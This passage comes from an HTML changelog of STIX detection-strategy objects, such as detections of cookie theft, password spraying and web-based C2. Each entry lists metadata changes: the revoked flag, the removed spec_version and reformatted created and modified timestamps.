collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0560] Detection of Valid Account Abuse Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0854] Detection of Virtual Private Server</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0838] Detection of Virtual Private Server</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0808] Detection of Vulnerabilities</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0867] Detection of Vulnerability Scanning</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0832] Detection of WHOIS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0027] Detection of Web Protocol-Based C2 Over HTTP, HTTPS, or WebSockets</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0882] Detection of Web Services</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0896] Detection of Web Services</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0509] Detection of Web Session Cookie Theft via File, Memory, and Network Artifacts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0552] Detection of Windows Service Creation or Modification</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0868] Detection of Wordlist Scanning</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0917] Detection of Written Content</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23T14:56:39.987Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 14:56:39.987000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:24:06.496Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0055] Detection strategy for Group Policy Discovery on Windows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0343] Direct Network Flood Detection across IaaS, Linux, Windows, and macOS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0487] Distributed Password Spraying via Authentication Failures Across Multiple Accounts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid 